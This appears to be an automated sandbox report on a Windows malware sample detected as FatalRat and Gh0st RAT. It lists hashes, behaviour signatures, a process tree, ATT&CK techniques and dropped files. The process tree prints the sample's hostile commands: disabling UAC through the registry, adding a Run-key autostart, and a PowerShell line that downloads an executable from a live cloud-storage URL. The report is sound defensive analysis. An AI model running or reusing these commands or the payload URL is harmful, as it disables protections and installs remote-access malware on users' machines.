Overview

overview

10

Static

static

3

2025-03-03...uk.exe

windows7-x64

10

2025-03-03...uk.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03/03/2025, 10:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-03-03_a69273e15f761f1aba60604ae7823581_hijackloader_ryuk.exe

  • Size

    20.2MB

  • MD5

    a69273e15f761f1aba60604ae7823581

  • SHA1

    f7a5fbb131ac38592208f534bb45d5927ef33bd1

  • SHA256

    361d4971fb5d11daf62336bbf8427a17c4e1b6c7b33db0c82037d34cc9ae07b8

  • SHA512

    84b4b62eca8d781d29bf21f519356460346d75a6998130ef88d23e69de6dea1a6d92df9dd2b2625261520ad3c5f8479c0d4637ce29900548e6e6bea2c8f15ede

  • SSDEEP

    196608:oatpgF2oM7Vk96Cy8xEqn0SweKG8PvMTnsOTLkE:9tpgF2oM7Vk96Cy8xEqn0MlAvYnsO3J

Score
10/10
fatalratgh0stratdefense_evasiondiscoveryexecutioninfostealerpersistenceratstealertrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://baba-1336130708.cos.ap-tokyo.myqcloud.com/as.exe

Signatures

  • FatalRat

    FatalRat is a modular infostealer family written in C++ first appearing in June 2021.

    stealertrojanfatalrat
  • Fatalrat family
    fatalrat
  • Gh0st RAT payload 2 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

    ratgh0strat
  • Gh0strat family
    gh0strat
  • UAC bypass 3 TTPs 1 IoCs
    defense_evasiontrojan
  • Fatal Rat payload 1 IoCs
    ratinfostealer
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-03_a69273e15f761f1aba60604ae7823581_hijackloader_ryuk.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-03_a69273e15f761f1aba60604ae7823581_hijackloader_ryuk.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\Downloads\20250303030353\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2684
      • C:\Windows\system32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        PID:2384
    • C:\programdata\20250303030353\Agghosts.exe
      "C:\programdata\20250303030353\Agghosts.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:548
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
      2⤵
      • Adds Run key to start application
      PID:2932
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:2956
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/as.exe', 'C:\Users\Public\Videos\bin.exe')"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2972

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\20250303030353\Agghosts.exe
      Filesize

      2.7MB

      MD5

      2a24dcd41bc3c5b5f7eceda525786578

      SHA1

      7e898f9ee5a97a1a261326f0168e8de44dcf8af4

      SHA256

      169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7

      SHA512

      aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a

      Download Submit

    • C:\ProgramData\lnk\2.lnk
      Filesize

      1KB

      MD5

      9fe82d16cb33ccdb33c50d5a0a7c1150

      SHA1

      eb9e69ef2f48e92551237a951e63617c2e23f66c

      SHA256

      fbc191719fa1cd0d4065a80b531569b80cb2e0a085da9a420734a22bcf74b1db

      SHA512

      429dafc2397b7758b7245e99d92157ad7d22b173bbcfa3744349b4e39dd97044824eb55ab88b23351a2916dbce68962f629e579391a8aa829e49a5e8d52635c6

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      71KB

      MD5

      83142242e97b8953c386f988aa694e4a

      SHA1

      833ed12fc15b356136dcdd27c61a50f59c5c7d50

      SHA256

      d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

      SHA512

      bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      344B

      MD5

      659e2cb4b435b9d4195ae961d5f7b407

      SHA1

      2346fc1ca0e3241181ad74eaff48ba661b380f76

      SHA256

      72d54d0cc039dff1d23187a41a12f026b9785bf5bddadef30bfe822d04536860

      SHA512

      1e66833a7cfadebe31250b837c348660916db19341c224444cac9e728a36e3decee8fa23dd42fa32905126394c6a4644a00f26faf79cbb576f488d05e7b6e6b9

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\TarC39E.tmp
      Filesize

      183KB

      MD5

      109cab5505f5e065b63d01361467a83b

      SHA1

      4ed78955b9272a9ed689b51bf2bf4a86a25e53fc

      SHA256

      ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673

      SHA512

      753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

      Download Submit

    • C:\Users\Public\Downloads\20250303030353\1.bat
      Filesize

      229B

      MD5

      fa42ebb1071abc0e618c296ea2cf71a6

      SHA1

      9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a

      SHA256

      395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d

      SHA512

      0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05

      Download Submit

    • C:\Users\Public\Videos\download_and_run.bat
      Filesize

      400B

      MD5

      8e5375901bc48c86773c54b132c9f85c

      SHA1

      c3aa392dbd79409726b80cfa54338d38882f162b

      SHA256

      fcc588c2a5b9d2b1752f81e261c587dfea693ecdaf4b965bc2a83442afe5ffa0

      SHA512

      1759b769dcac37f4511d53b7f0b2f814238ffa927585f46c9230a0d142e20c1ba2e2de649c717dce85ce2b8cd8808aa6a4283ac1406933773dc4bde336db42e2

      Download Submit

    • C:\programdata\20250303030353\Ensup.log
      Filesize

      192KB

      MD5

      2fd94f6e1d71454d716a126f0d7450ac

      SHA1

      5d966df95c741880089e9078af921a22216516ec

      SHA256

      a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5

      SHA512

      340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2

      Download Submit

    • C:\programdata\20250303030353\libcef.dll
      Filesize

      1.9MB

      MD5

      b7f8c3416cdfd6f46c790da064f66099

      SHA1

      d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6

      SHA256

      b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d

      SHA512

      24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7

      Download Submit

    • memory/548-122-0x0000000003780000-0x00000000038CD000-memory.dmp

      Filesize

      1.3MB

      Download

    • memory/548-76-0x0000000000C90000-0x0000000000CB9000-memory.dmp

      Filesize

      164KB

      Download

    • memory/548-125-0x0000000003780000-0x00000000038CD000-memory.dmp

      Filesize

      1.3MB

      Download

    • memory/548-126-0x0000000003780000-0x00000000038CD000-memory.dmp

      Filesize

      1.3MB

      Download

    • memory/1936-93-0x0000000003E10000-0x0000000004224000-memory.dmp

      Filesize

      4.1MB

      Download

    • memory/1936-38-0x0000000003A00000-0x0000000003E10000-memory.dmp

      Filesize

      4.1MB

      Download

    • memory/1936-37-0x0000000003E10000-0x0000000004224000-memory.dmp

      Filesize

      4.1MB

      Download

    • memory/1936-94-0x0000000003A00000-0x0000000003E10000-memory.dmp

      Filesize

      4.1MB

      Download

    • memory/1936-40-0x0000000001ED0000-0x0000000001ED1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1936-39-0x0000000003E10000-0x0000000004224000-memory.dmp

      Filesize

      4.1MB

      Download

    • memory/2972-100-0x000000001B610000-0x000000001B8F2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2972-101-0x0000000002720000-0x0000000002728000-memory.dmp

      Filesize

      32KB

      Download